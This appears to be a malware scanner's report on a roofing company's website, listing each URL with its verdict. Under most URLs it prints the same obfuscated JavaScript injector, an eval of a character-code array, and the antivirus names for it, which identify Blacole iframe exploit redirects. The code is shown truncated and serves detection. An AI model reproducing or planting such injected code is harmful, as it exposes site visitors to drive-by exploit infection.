Request | Server response | Status |
http://ahighperformanceroofing.com/ | 200 OK Content-Length: 17959 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,113,97,107,121,100,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,112,96,109,120,99,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,102,104,98,101,99,102
... 957 bytes are skipped ...07,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,113,97,107,121,100,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,112,96,109,120,99,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,113,97,107,121,100,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jsNavBarFuncs.js | 200 OK Content-Length: 14386 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,105,106,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,105,106,102,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,103,100,100,98,104,96,10
... 924 bytes are skipped ...116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,105,106,102,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,109,105,106,102,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,108,104,108,101,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+480!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/global_navtree.js | 200 OK Content-Length: 2939 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,105,106,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,105,106,102,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,103,100,100,98,104,96,10
... 924 bytes are skipped ...116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,105,106,102,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,109,105,106,102,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,108,104,108,101,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+480!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/wp_navbar_menub.js | 200 OK Content-Length: 17894 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,105,106,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,105,106,102,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,103,100,100,98,104,96,10
... 924 bytes are skipped ...116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,105,106,102,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,109,105,106,102,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,108,104,108,101,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+480!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jsFlashVer.js | 200 OK Content-Length: 9959 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,105,106,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,105,106,102,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,103,100,100,98,104,96,10
... 924 bytes are skipped ...116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,105,106,102,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,109,105,106,102,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,108,104,108,101,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+480!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jspngfix.js | 200 OK Content-Length: 2795 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,105,106,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,105,106,102,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,103,100,100,98,104,96,10
... 924 bytes are skipped ...116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,105,106,102,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,109,105,106,102,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,108,104,108,101,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+480!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jsValidation.js | 200 OK Content-Length: 3073 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,105,106,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,105,106,102,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,103,100,100,98,104,96,10
... 924 bytes are skipped ...116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,105,106,102,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,109,105,106,102,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,108,104,108,101,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+480!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/index.html | 200 OK Content-Length: 17959 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,113,97,107,121,100,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,112,96,109,120,99,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,102,104,98,101,99,102
... 957 bytes are skipped ...07,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,113,97,107,121,100,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,112,96,109,120,99,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,113,97,107,121,100,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/gutteringroofing.html | 200 OK Content-Length: 14108 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,113,97,107,121,100,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,112,96,109,120,99,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,102,104,98,101,99,102
... 957 bytes are skipped ...07,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,113,97,107,121,100,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,112,96,109,120,99,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,113,97,107,121,100,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/Services.html | 200 OK Content-Length: 13757 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,113,97,107,121,100,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,112,96,109,120,99,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,102,104,98,101,99,102
... 957 bytes are skipped ...07,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,113,97,107,121,100,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,112,96,109,120,99,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,113,97,107,121,100,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/contactus.html | 200 OK Content-Length: 15445 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,113,97,107,121,100,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,112,96,109,120,99,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,102,104,98,101,99,102
... 957 bytes are skipped ...07,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,113,97,107,121,100,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,112,96,109,120,99,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,113,97,107,121,100,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://maps.google.com/maps/api/js?amp;vs=3.3&sensor=false | 200 OK Content-Length: 4901 Content-Type: text/javascript | clean |
http://ahighperformanceroofing.com/wpscripts/jsWPGoogleMaps.js | 200 OK Content-Length: 6592 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,109,105,106,102,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,109,105,106,102,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,103,100,100,98,104,96,10
... 924 bytes are skipped ...116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,105,106,102,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,109,105,106,102,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,108,104,108,101,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+480!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)Antivirus reports:- AntiVir
- JS/BlacoleRef.W.40
- Avast
- JS:Iframe-XK [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.S
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_IFRAMERE.SMJF
- Comodo
- TrojWare.JS.Agent.GF
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_IFRAMERE.SMJF
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/IframeRef.I
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.S
- Fortinet
- JS/Blacole.GC!exploit
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bcslpm
- F-Secure
- JS:Exploit.JS.Blacole.S
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- GData
- JS:Exploit.JS.Blacole.S
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/test404page.js | 404 Not Found Content-Length: 414 Content-Type: text/html | clean |